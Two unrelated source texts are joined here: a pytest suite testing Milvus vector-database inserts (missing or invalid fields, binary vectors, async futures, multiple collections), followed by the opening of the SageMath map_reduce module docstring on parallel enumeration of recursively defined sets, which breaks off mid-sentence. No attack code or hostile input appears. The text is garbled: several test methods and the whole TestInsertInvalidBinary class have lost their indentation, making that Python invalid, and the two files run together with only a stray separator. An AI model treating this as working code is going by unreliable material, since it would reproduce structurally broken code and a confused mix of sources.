def test_insert_with_field_less(self, connect, collection):
    """
    target: test insert entities, with less fields than collection schema
    method: remove entity field
    expected: error raised
    """
    bad_entity = remove_field(copy.deepcopy(default_entity))
    with pytest.raises(Exception):
        connect.insert(collection, bad_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_vector_less(self, connect, collection):
    """
    target: test insert entities, with less fields than collection schema
    method: remove entity vector field
    expected: error raised
    """
    bad_entity = remove_vector_field(copy.deepcopy(default_entity))
    with pytest.raises(Exception):
        connect.insert(collection, bad_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_value(self, connect, collection):
    """
    target: test insert entities, with no vector field value
    method: remove entity values of vector field
    expected: error raised
    """
    bad_entity = copy.deepcopy(default_entity)
    # The vector field is the last entry; drop its payload.
    del bad_entity[-1]["values"]
    with pytest.raises(Exception):
        connect.insert(collection, bad_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_type(self, connect, collection):
    """
    target: test insert entities, with no vector field type
    method: remove entity vector field
    expected: error raised
    """
    bad_entity = copy.deepcopy(default_entity)
    # The vector field is the last entry; drop its type descriptor.
    del bad_entity[-1]["type"]
    with pytest.raises(Exception):
        connect.insert(collection, bad_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_name(self, connect, collection):
    """
    target: test insert entities, with no vector field name
    method: remove entity vector field
    expected: error raised
    """
    bad_entity = copy.deepcopy(default_entity)
    # The vector field is the last entry; drop its name.
    del bad_entity[-1]["name"]
    with pytest.raises(Exception):
        connect.insert(collection, bad_entity)
# todo fix timeout
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(30)
def test_collection_insert_rows_count_multi_threading(self, args, collection):
    """
    target: test collection rows_count is correct or not with multi threading
    method: create collection and insert entities in it(idmap),
        assert the value returned by count_entities method is equal to length of entities
    expected: the count is equal to the length of entities
    """
    if args["handler"] == "HTTP":
        pytest.skip("Skip test in http mode")
    thread_num = 8
    milvus = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"], try_connect=False)

    def worker(thread_i):
        logging.getLogger().info("In thread-%d" % thread_i)
        milvus.insert(collection, default_entities)
        milvus.flush([collection])

    workers = [threading.Thread(target=worker, args=(idx,)) for idx in range(thread_num)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    stats = milvus.get_collection_stats(collection)
    assert stats[row_count] == thread_num * default_nb
# TODO: unable to set config
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_disable_auto_flush(self, connect, collection):
    """
    target: test insert entities, with disable autoflush
    method: disable autoflush and insert, get entity
    expected: the count is equal to 0
    """
    fetch_num = 500
    disable_flush(connect)
    insert_res = connect.insert(collection, default_entities)
    pk_ids = insert_res.primary_keys
    # With auto-flush off, inserted rows should not be retrievable yet.
    fetched = connect.get_entity_by_id(collection, pk_ids[:fetch_num])
    assert fetch_num == len(fetched)
    assert fetched[0] is None
class TestInsertBinary:
    """Insert tests against binary-vector collections (JACCARD metric)."""

    @pytest.fixture(
        scope="function",
        params=gen_binary_index()
    )
    def get_binary_index(self, request):
        # Binary collections are exercised with the JACCARD metric only.
        request.param["metric_type"] = "JACCARD"
        return request.param

    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_binary_entities(self, connect, binary_collection):
        """
        target: test insert entities in binary collection
        method: create collection and insert binary entities in it
        expected: the collection row count equals to nb
        """
        insert_res = connect.insert(binary_collection, default_binary_entities)
        assert default_nb == len(insert_res.primary_keys)
        connect.flush([binary_collection])
        stats = connect.get_collection_stats(binary_collection)
        assert default_nb == stats[row_count]

    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_binary_partition(self, connect, binary_collection):
        """
        target: test insert entities and create partition tag
        method: create collection and insert binary entities in it, with the partition_name param
        expected: the collection row count equals to nb
        """
        connect.create_partition(binary_collection, default_tag)
        insert_res = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
        assert default_nb == len(insert_res.primary_keys)
        assert connect.has_partition(binary_collection, default_tag)
        connect.flush([binary_collection])
        stats = connect.get_collection_stats(binary_collection)
        assert default_nb == stats[row_count]

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_binary_multi_times(self, connect, binary_collection):
        """
        target: test insert entities multi times and final flush
        method: create collection and insert binary entity multi and final flush
        expected: the collection row count equals to nb
        """
        for _ in range(default_nb):
            single_res = connect.insert(binary_collection, default_binary_entity)
            assert 1 == len(single_res.primary_keys)
        connect.flush([binary_collection])
        stats = connect.get_collection_stats(binary_collection)
        assert default_nb == stats[row_count]

    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_binary_after_create_index(self, connect, binary_collection, get_binary_index):
        """
        target: test insert binary entities after build index
        method: build index and insert entities
        expected: no error raised
        """
        connect.create_index(binary_collection, binary_field_name, get_binary_index)
        insert_res = connect.insert(binary_collection, default_binary_entities)
        assert default_nb == len(insert_res.primary_keys)
        connect.flush([binary_collection])
        described = connect.describe_index(binary_collection, "")
        create_target_index(get_binary_index, binary_field_name)
        assert described == get_binary_index

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_binary_create_index(self, connect, binary_collection, get_binary_index):
        """
        target: test build index insert after vector
        method: insert vector and build index
        expected: no error raised
        """
        insert_res = connect.insert(binary_collection, default_binary_entities)
        assert default_nb == len(insert_res.primary_keys)
        connect.flush([binary_collection])
        connect.create_index(binary_collection, binary_field_name, get_binary_index)
        described = connect.describe_index(binary_collection, "")
        create_target_index(get_binary_index, binary_field_name)
        assert described == get_binary_index

    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_binary_search(self, connect, binary_collection):
        """
        target: test search vector after insert vector after a while
        method: insert vector, sleep, and search collection
        expected: no error raised
        """
        connect.insert(binary_collection, default_binary_entities)
        connect.flush([binary_collection])
        query, _ = gen_query_vectors(binary_field_name, default_binary_entities, default_top_k, 1,
                                     metric_type="JACCARD")
        connect.load_collection(binary_collection)
        search_res = connect.search(binary_collection, query)
        logging.getLogger().debug(search_res)
        assert default_top_k == len(search_res[0])
class TestInsertAsync:
    """Tests for the `_async=True` variant of insert (futures and callbacks)."""

    @pytest.fixture(scope="function", autouse=True)
    def skip_http_check(self, args):
        # Async insert is not exercised through the HTTP handler.
        if args["handler"] == "HTTP":
            pytest.skip("skip in http mode")

    @pytest.fixture(
        scope="function",
        params=[
            1,
            1000
        ],
    )
    def insert_count(self, request):
        # Single-row and bulk insert sizes.
        yield request.param

    def check_status(self, result):
        # Failure callback: the future must carry no result.
        logging.getLogger().info("In callback check status")
        assert not result

    def check_result(self, result):
        # Success callback: the future must carry a result.
        logging.getLogger().info("In callback check results")
        assert result

    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_async(self, connect, collection, insert_count):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        row_num = insert_count
        future = connect.insert(collection, gen_entities(row_num), _async=True)
        pk_ids = future.result().primary_keys
        connect.flush([collection])
        assert row_num == len(pk_ids)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_async_false(self, connect, collection, insert_count):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        row_num = insert_count
        # _async=False returns the result directly, not a future.
        insert_res = connect.insert(collection, gen_entities(row_num), _async=False)
        connect.flush([collection])
        assert row_num == len(insert_res.primary_keys)

    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_async_callback(self, connect, collection, insert_count):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        row_num = insert_count
        future = connect.insert(collection, gen_entities(row_num), _async=True, _callback=self.check_result)
        future.done()
        assert row_num == len(future.result().primary_keys)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_async_long(self, connect, collection):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        row_num = 50000
        future = connect.insert(collection, gen_entities(row_num), _async=True, _callback=self.check_result)
        insert_res = future.result()
        assert row_num == len(insert_res.primary_keys)
        connect.flush([collection])
        stats = connect.get_collection_stats(collection)
        logging.getLogger().info(stats)
        assert row_num == stats[row_count]

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_async_callback_timeout(self, connect, collection):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        row_num = 100000
        # A 1-second timeout on a large batch should make result() raise.
        future = connect.insert(collection, gen_entities(row_num), _async=True, _callback=self.check_status, timeout=1)
        with pytest.raises(Exception):
            future.result()

    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_async_invalid_params(self, connect):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        # A never-created collection: the failure surfaces from result().
        missing_collection = gen_unique_str()
        future = connect.insert(missing_collection, default_entities, _async=True)
        future.done()
        with pytest.raises(Exception):
            future.result()

    # 1339
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_async_invalid_params_raise_exception(self, connect, collection):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        empty_entities = []
        future = connect.insert(collection, empty_entities, _async=True)
        future.done()
        with pytest.raises(Exception):
            future.result()
class TestInsertMultiCollections:
    """
    ******************************************************************
      The following cases are used to test `insert` function
    ******************************************************************
    """
    @pytest.fixture(
        scope="function",
        params=gen_simple_index()
    )
    def get_simple_index(self, request, connect):
        # Parametrize over every simple index configuration.
        logging.getLogger().info(request.param)
        # if str(connect._cmd("mode")) == "CPU":
        #     if request.param["index_type"] in index_cpu_not_support():
        #         pytest.skip("sq8h not support in CPU mode")
        return request.param

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_entity_multi_collections(self, connect):
        '''
        target: test insert entities
        method: create 10 collections and insert entities into them in turn
        expected: row count
        '''
        collection_num = 10
        collection_list = []
        for i in range(collection_num):
            collection_name = gen_unique_str(uid)
            collection_list.append(collection_name)
            connect.create_collection(collection_name, default_fields)
            result = connect.insert(collection_name, default_entities)
            connect.flush([collection_name])
            assert len(result.primary_keys) == default_nb
            stats = connect.get_collection_stats(collection_name)
            assert stats[row_count] == default_nb
        # Clean up every collection created by this case.
        for i in range(collection_num):
            connect.drop_collection(collection_list[i])

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_drop_collection_insert_entity_another(self, connect, collection):
        '''
        target: test insert vector to collection_1 after collection_2 deleted
        method: delete collection_2 and insert vector to collection_1
        expected: row count equals the length of entities inserted
        '''
        collection_name = gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        # Dropping one collection must not affect inserts into another.
        connect.drop_collection(collection)
        result = connect.insert(collection_name, default_entity)
        connect.flush([collection_name])
        assert len(result.primary_keys) == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_create_index_insert_entity_another(self, connect, collection, get_simple_index):
        '''
        target: test insert vector to collection_2 after build index for collection_1
        method: build index and insert vector
        expected: status ok
        '''
        collection_name = gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        connect.create_index(collection, field_name, get_simple_index)
        result = connect.insert(collection_name, default_entity)
        assert len(result.primary_keys) == 1
        if get_simple_index["index_type"] != "FLAT":
            index = connect.describe_index(collection, "")
            create_target_index(get_simple_index, field_name)
            assert index == get_simple_index
        connect.drop_collection(collection_name)

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_entity_create_index_another(self, connect, collection, get_simple_index):
        '''
        target: test insert vector to collection_2 after build index for collection_1
        method: build index and insert vector
        expected: status ok
        '''
        collection_name = gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        result = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.create_index(collection_name, field_name, get_simple_index)
        if get_simple_index["index_type"] != "FLAT":
            index = connect.describe_index(collection_name, "")
            create_target_index(get_simple_index, field_name)
            assert index == get_simple_index
        stats = connect.get_collection_stats(collection)
        assert stats[row_count] == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_entity_sleep_create_index_another(self, connect, collection, get_simple_index):
        '''
        target: test insert vector to collection_2 after build index for collection_1 for a while
        method: build index and insert vector
        expected: status ok
        '''
        collection_name = gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        result = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.create_index(collection_name, field_name, get_simple_index)
        stats = connect.get_collection_stats(collection)
        assert stats[row_count] == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_entity_insert_entity_another(self, connect, collection):
        '''
        target: test insert entity to collection_1 after search collection_2
        method: search collection and insert entity
        expected: status ok
        '''
        collection_name = gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        connect.load_collection(collection)
        res = connect.search(collection, default_single_query)
        # `collection` is empty, so the search returns no hits.
        assert len(res[0]) == 0
        connect.insert(collection_name, default_entity)
        connect.flush([collection_name])
        stats = connect.get_collection_stats(collection_name)
        assert stats[row_count] == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_entity_search_entity_another(self, connect, collection):
        '''
        target: test insert entity to collection_1 after search collection_2
        method: search collection and insert entity
        expected: status ok
        '''
        collection_name = gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        result = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.load_collection(collection_name)
        res = connect.search(collection_name, default_single_query)
        stats = connect.get_collection_stats(collection)
        assert stats[row_count] == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_entity_sleep_search_entity_another(self, connect, collection):
        '''
        target: test insert entity to collection_1 after search collection_2 a while
        method: search collection, sleep, and insert entity
        expected: status ok
        '''
        # NOTE(review): docstring mentions a sleep but the body performs none —
        # confirm whether a sleep was intended here.
        collection_name = gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        result = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.load_collection(collection_name)
        res = connect.search(collection_name, default_single_query)
        assert len(res[0]) == 0

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def _test_insert_entity_during_release_collection(self, connect, collection):
        '''
        target: test insert entity during release
        method: release collection async, then do insert operation
        expected: insert ok
        '''
        for i in range(10):
            connect.insert(collection, default_entities)
        connect.flush([collection])
        connect.load_collection(collection)

        def release(coll):
            # Runs on a worker thread while the main thread keeps inserting.
            connect.release_collection(coll)

        # BUGFIX: `release` previously took no parameters while the thread was
        # started with args=(collection,); the worker died with a TypeError and
        # never actually released the collection. It now accepts the collection.
        t = threading.Thread(target=release, args=(collection,))
        t.start()
        result = connect.insert(collection, default_entities)
        assert len(result.primary_keys) == default_nb
class TestInsertInvalid(object):
    """
    Test inserting vectors with invalid collection names
    """
    @pytest.fixture(scope="function", params=gen_invalid_strs())
    def get_collection_name(self, request):
        # Invalid strings used as collection names.
        yield request.param

    @pytest.fixture(scope="function", params=gen_invalid_strs())
    def get_tag_name(self, request):
        # Invalid strings used as partition (tag) names.
        yield request.param

    @pytest.fixture(scope="function", params=gen_invalid_strs())
    def get_field_name(self, request):
        # Invalid strings used as field names.
        yield request.param

    @pytest.fixture(scope="function", params=gen_invalid_strs())
    def get_field_type(self, request):
        # Invalid strings used as field types.
        yield request.param

    @pytest.fixture(scope="function", params=gen_invalid_strs())
    def get_field_int_value(self, request):
        # Invalid strings used as int-field values.
        yield request.param

    @pytest.fixture(scope="function", params=gen_invalid_ints())
    def get_entity_id(self, request):
        # Invalid (non-int64) values used as explicit entity ids.
        yield request.param

    @pytest.fixture(scope="function", params=gen_invalid_vectors())
    def get_field_vectors_value(self, request):
        # Invalid values injected into vector-field data.
        yield request.param

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_ids_invalid(self, connect, id_collection, get_entity_id):
        """
        target: test insert, with using customize ids, which are not int64
        method: create collection and insert entities in it
        expected: raise an exception
        """
        bad_ids = [get_entity_id] * default_nb
        with pytest.raises(Exception):
            connect.insert(id_collection, default_entities, bad_ids)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_collection_name(self, connect, get_collection_name):
        # An invalid collection name must be rejected on insert.
        with pytest.raises(Exception):
            connect.insert(get_collection_name, default_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_partition_name(self, connect, collection, get_tag_name):
        # A None partition name is accepted (falls back to default); any other
        # invalid name must raise.
        connect.create_partition(collection, default_tag)
        if get_tag_name is None:
            connect.insert(collection, default_entity, partition_name=get_tag_name)
        else:
            with pytest.raises(Exception):
                connect.insert(collection, default_entity, partition_name=get_tag_name)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_name(self, connect, collection, get_field_name):
        # Renaming the "int64" field to an invalid name must make insert fail.
        bad_entity = update_field_name(copy.deepcopy(default_entity), "int64", get_field_name)
        with pytest.raises(Exception):
            connect.insert(collection, bad_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_type(self, connect, collection, get_field_type):
        # Replacing the float field type with an invalid value must make insert fail.
        bad_entity = update_field_type(copy.deepcopy(default_entity), 'float', get_field_type)
        with pytest.raises(Exception):
            connect.insert(collection, bad_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_value(self, connect, collection, get_field_int_value):
        # Replacing the int64 field type with an invalid value must make insert fail.
        bad_entity = update_field_type(copy.deepcopy(default_entity), 'int64', get_field_int_value)
        with pytest.raises(Exception):
            connect.insert(collection, bad_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_entity_value(self, connect, collection, get_field_vectors_value):
        bad_entity = copy.deepcopy(default_entity)
        # Corrupt one component of the first vector with an invalid value.
        bad_entity[-1]["values"][0][1] = get_field_vectors_value
        with pytest.raises(Exception):
            connect.insert(collection, bad_entity)
class TestInsertInvalidBinary(object):
"""
Test inserting vectors with invalid collection names
"""
@pytest.fixture(
    scope="function",
    params=gen_invalid_strs()
)
def get_collection_name(self, request):
    # Invalid strings used as collection names.
    yield request.param
@pytest.fixture(
    scope="function",
    params=gen_invalid_strs()
)
def get_tag_name(self, request):
    # Invalid strings used as partition (tag) names.
    yield request.param
@pytest.fixture(
    scope="function",
    params=gen_invalid_strs()
)
def get_field_name(self, request):
    # Invalid strings used as field names.
    yield request.param
@pytest.fixture(
    scope="function",
    params=gen_invalid_strs()
)
def get_field_type(self, request):
    # Invalid strings used as field types.
    yield request.param
@pytest.fixture(
    scope="function",
    params=gen_invalid_strs()
)
def get_field_int_value(self, request):
    # Invalid strings used as int-field values.
    yield request.param
@pytest.fixture(
    scope="function",
    params=gen_invalid_ints()
)
def get_entity_id(self, request):
    # Invalid (non-int64) values used as explicit entity ids.
    yield request.param
@pytest.fixture(
    scope="function",
    params=gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
    # Invalid values injected into binary vector-field data.
    yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_name(self, connect, binary_collection, get_field_name):
tmp_entity = update_field_name(copy.deepcopy(default_binary_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_value(self, connect, binary_collection, get_field_int_value):
tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', get_field_int_value)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entity_value(self, connect, binary_collection, get_field_vectors_value):
tmp_entity = copy.deepcopy(default_binary_entity)
src_vectors = tmp_entity[-1]["values"]
src_vectors[0] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_invalid(self, connect, binary_id_collection, get_entity_id):
'''
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise an exception
'''
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.insert(binary_id_collection, default_binary_entities, ids)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_type(self, connect, binary_collection, get_field_type):
"""
target: test insert with invalid field type
method: insert with invalid field type
expected: raise exception
"""
field_type = get_field_type
tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', field_type)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entities_value(self, connect, binary_collection, get_field_vectors_value):
"""
target: test insert with invalid field
method: insert with invalid field value
expected: raise exception
"""
tmp_entities = copy.deepcopy(default_binary_entities)
src_vector = tmp_entities[-1]["values"]
src_vector[1] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entities)
|
map_reduce.py | r"""
Parallel computations using RecursivelyEnumeratedSet and Map-Reduce
There is an efficient way to distribute computations on a set
`S` of objects defined by :func:`RecursivelyEnumeratedSet`
(see :mod:`sage.sets.recursively_enumerated_set` for more details)
over which one would like to perform the following kind of operations:
* Compute the cardinality of a (very large) set defined recursively
(through a call to :class:`RecursivelyEnumeratedSet
of forest type<sage.combinat.backtrack.SearchForest>`)
* More generally, compute any kind of generating series over this set
* Test a conjecture, e.g. find an element of `S` satisfying a specific
property, or check that none does or that they all do
* Count/list the elements of `S` that have a specific property
* Apply any map/reduce kind of operation over the elements of `S`
AUTHORS:
- Florent Hivert -- code, documentation (2012--2016)
- Jean Baptiste Priez -- prototype, debugging help on MacOSX (2011-June, 2016)
- Nathann Cohen -- some documentation (2012)
Contents
--------
- :ref:`basic-usage`
- :ref:`advanced-use`
- :ref:`profiling`
- :ref:`logging`
- :ref:`protocol-description`
- :ref:`examples`
How is this different from usual MapReduce ?
--------------------------------------------
This implementation is specific to :class:`RecursivelyEnumeratedSet
of forest type<sage.combinat.backtrack.SearchForest>`, and uses its
properties to do its job. Not only mapping and reducing but also
**generating the elements** of `S` is done on different processors.
.. _basic-usage:
How can I use all that stuff?
-----------------------------
First, you need the information necessary to describe a
:class:`RecursivelyEnumeratedSet of forest
type<sage.combinat.backtrack.SearchForest>` representing your set `S` (see
:mod:`sage.sets.recursively_enumerated_set`). Then, you need to provide a
"map" function as well as a "reduce" function. Here are some examples:
* **Counting the number of elements.** In this situation, the map function
can be set to ``lambda x: 1``, and the reduce function just adds the
values together, i.e. ``lambda x, y: x + y``.
We count binary words of length `\leq 16`::
sage: seeds = [[]]
sage: succ = lambda l: [l + [0], l + [1]] if len(l) < 16 else []
sage: S = RecursivelyEnumeratedSet(seeds, succ,
....: structure='forest', enumeration='depth')
sage: map_function = lambda x: 1
sage: reduce_function = lambda x, y: x + y
sage: reduce_init = 0
sage: S.map_reduce(map_function, reduce_function, reduce_init)
131071
This matches the number of binary words of length `\leq 16`::
sage: factor(131071 + 1)
2^17
Note that the map and reduce functions here have the default values of the
:meth:`sage.combinat.backtrack.SearchForest.map_reduce` method
so that the number of elements can be obtained more simply with::
sage: S.map_reduce()
131071
Instead of using :func:`RecursivelyEnumeratedSet`, one can directly use
:class:`RESetMapReduce`, which gives finer
control over the parallel execution (see :ref:`advanced-use` below)::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(
....: roots=[[]],
....: children=lambda l: [l + [0], l + [1]] if len(l) < 16 else [],
....: map_function=lambda x: 1,
....: reduce_function=lambda x, y: x + y,
....: reduce_init=0)
sage: S.run()
131071
* **Generating series.** For this, take a Map function that associates a
monomial to each element of `S`, while the Reduce function is still equal to
``lambda x, y: x + y``.
We compute the generating series for counting binary words of each
length `\leq 16`::
sage: S = RecursivelyEnumeratedSet(
....: [[]], lambda l: [l + [0], l + [1]] if len(l) < 16 else [],
....: structure='forest', enumeration='depth')
sage: x = polygen(ZZ)
sage: sp = S.map_reduce(
....: map_function=lambda z: x**len(z),
....: reduce_function=lambda x, y: x + y,
....: reduce_init=0)
sage: sp
65536*x^16 + 32768*x^15 + 16384*x^14 + 8192*x^13 + 4096*x^12
+ 2048*x^11 + 1024*x^10 + 512*x^9 + 256*x^8 + 128*x^7 + 64*x^6
+ 32*x^5 + 16*x^4 + 8*x^3 + 4*x^2 + 2*x + 1
This is of course `\sum_{i=0}^{16} (2x)^i`::
sage: sp == sum((2*x)^i for i in range(17))
True
Here is another example where we count permutations of size `\leq 8` (here
we use the default values)::
sage: S = RecursivelyEnumeratedSet(
....: [[]],
....: lambda l: ([l[:i] + [len(l)] + l[i:]
....: for i in range(len(l) + 1)] if len(l) < 8 else []),
....: structure='forest',
....: enumeration='depth')
sage: x = polygen(ZZ)
sage: sp = S.map_reduce(lambda z: x**len(z)); sp
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
This is of course `\sum_{i=0}^{8} i! x^i`::
sage: sp == sum(factorial(i)*x^i for i in range(9))
True
* **Post Processing.** We now demonstrate the use of ``post_process``. We
generate the permutation as previously, but we only perform the map/reduce
computation on those of even ``len``. Of course we get the even part of the
previous generating series::
sage: S = RecursivelyEnumeratedSet(
....: [[]],
....: lambda l: ([l[:i] + [len(l) + 1] + l[i:]
....: for i in range(len(l) + 1)] if len(l) < 8 else []),
....: post_process=lambda l: l if len(l) % 2 == 0 else None,
....: structure='forest',
....: enumeration='depth')
sage: sp = S.map_reduce(lambda z: x**len(z)); sp
40320*x^8 + 720*x^6 + 24*x^4 + 2*x^2 + 1
This is also useful for example to call a constructor on the generated
elements::
sage: S = RecursivelyEnumeratedSet(
....: [[]],
....: lambda l: ([l[:i] + [len(l) + 1] + l[i:]
....: for i in range(len(l) + 1)] if len(l) < 5 else []),
....: post_process=lambda l: Permutation(l) if len(l) == 5 else None,
....: structure='forest',
....: enumeration='depth')
sage: x = polygen(ZZ)
sage: sp = S.map_reduce(lambda z: x**z.number_of_inversions()); sp
x^10 + 4*x^9 + 9*x^8 + 15*x^7 + 20*x^6 + 22*x^5 + 20*x^4 + 15*x^3 + 9*x^2 + 4*x + 1
We get here a polynomial which is the `q`-factorial (in the variable `x`) of `5`,
that is, `\prod_{i=1}^{5} \frac{1-x^i}{1-x}`::
sage: x = polygen(ZZ)
sage: prod((1-x^i)//(1-x) for i in range(1, 6))
x^10 + 4*x^9 + 9*x^8 + 15*x^7 + 20*x^6 + 22*x^5 + 20*x^4 + 15*x^3 + 9*x^2 + 4*x + 1
Compare::
sage: from sage.combinat.q_analogues import q_factorial
sage: q_factorial(5)
q^10 + 4*q^9 + 9*q^8 + 15*q^7 + 20*q^6 + 22*q^5 + 20*q^4 + 15*q^3 + 9*q^2 + 4*q + 1
* **Listing the objects.** One can also compute the list of objects in a
:class:`RecursivelyEnumeratedSet of forest type<sage.combinat.backtrack.SearchForest>`
using :class:`RESetMapReduce`. As an example, we compute the set of numbers
between 1 and 63, generated by their binary expansion::
sage: S = RecursivelyEnumeratedSet(
....: [1],
....: lambda l: [(l<<1)|0, (l<<1)|1] if l < 1<<5 else [],
....: structure='forest',
....: enumeration='depth')
Here is the list computed without :class:`RESetMapReduce`::
sage: serial = list(S)
sage: serial
[1, 2, 4, 8, 16, 32, 33, 17, 34, 35, 9, 18, 36, 37, 19, 38, 39, 5, 10,
20, 40, 41, 21, 42, 43, 11, 22, 44, 45, 23, 46, 47, 3, 6, 12, 24, 48,
49, 25, 50, 51, 13, 26, 52, 53, 27, 54, 55, 7, 14, 28, 56, 57, 29, 58,
59, 15, 30, 60, 61, 31, 62, 63]
Here is how to perform the parallel computation. The order of the lists
depends on the synchronisation of the various computation processes and
therefore should be considered as random::
sage: parall = S.map_reduce(lambda x: [x], lambda x, y: x + y, [])
sage: parall # random
[1, 3, 7, 15, 31, 63, 62, 30, 61, 60, 14, 29, 59, 58, 28, 57, 56, 6, 13,
27, 55, 54, 26, 53, 52, 12, 25, 51, 50, 24, 49, 48, 2, 5, 11, 23, 47,
46, 22, 45, 44, 10, 21, 43, 42, 20, 41, 40, 4, 9, 19, 39, 38, 18, 37,
36, 8, 17, 35, 34, 16, 33, 32]
sage: sorted(serial) == sorted(parall)
True
.. _advanced-use:
Advanced use
------------
Fine control over the execution of a map/reduce computation is achieved
via parameters passed to the :meth:`RESetMapReduce.run` method.
The following three parameters can be used:
- ``max_proc`` -- (integer, default: ``None``) if given, the
maximum number of worker processors to use. The actual number
is also bounded by the value of the environment variable
``SAGE_NUM_THREADS`` (the number of cores by default).
- ``timeout`` -- a timeout on the computation (default: ``None``)
- ``reduce_locally`` -- whether the workers should reduce locally
their work or sends results to the master as soon as possible.
See :class:`RESetMapReduceWorker` for details.
Here is an example of how to deal with a timeout::
sage: from sage.parallel.map_reduce import (RESetMPExample, AbortError)
sage: EX = RESetMPExample(maxl=100)
sage: try:
....: res = EX.run(timeout=0.01)
....: except AbortError:
....: print("Computation timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation timeout
The following should not timeout even on a very slow machine::
sage: EX = RESetMPExample(maxl=8)
sage: try:
....: res = EX.run(timeout=60)
....: except AbortError:
....: print("Computation Timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation normally finished
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
As for ``reduce_locally``, one should not see any difference, except for speed
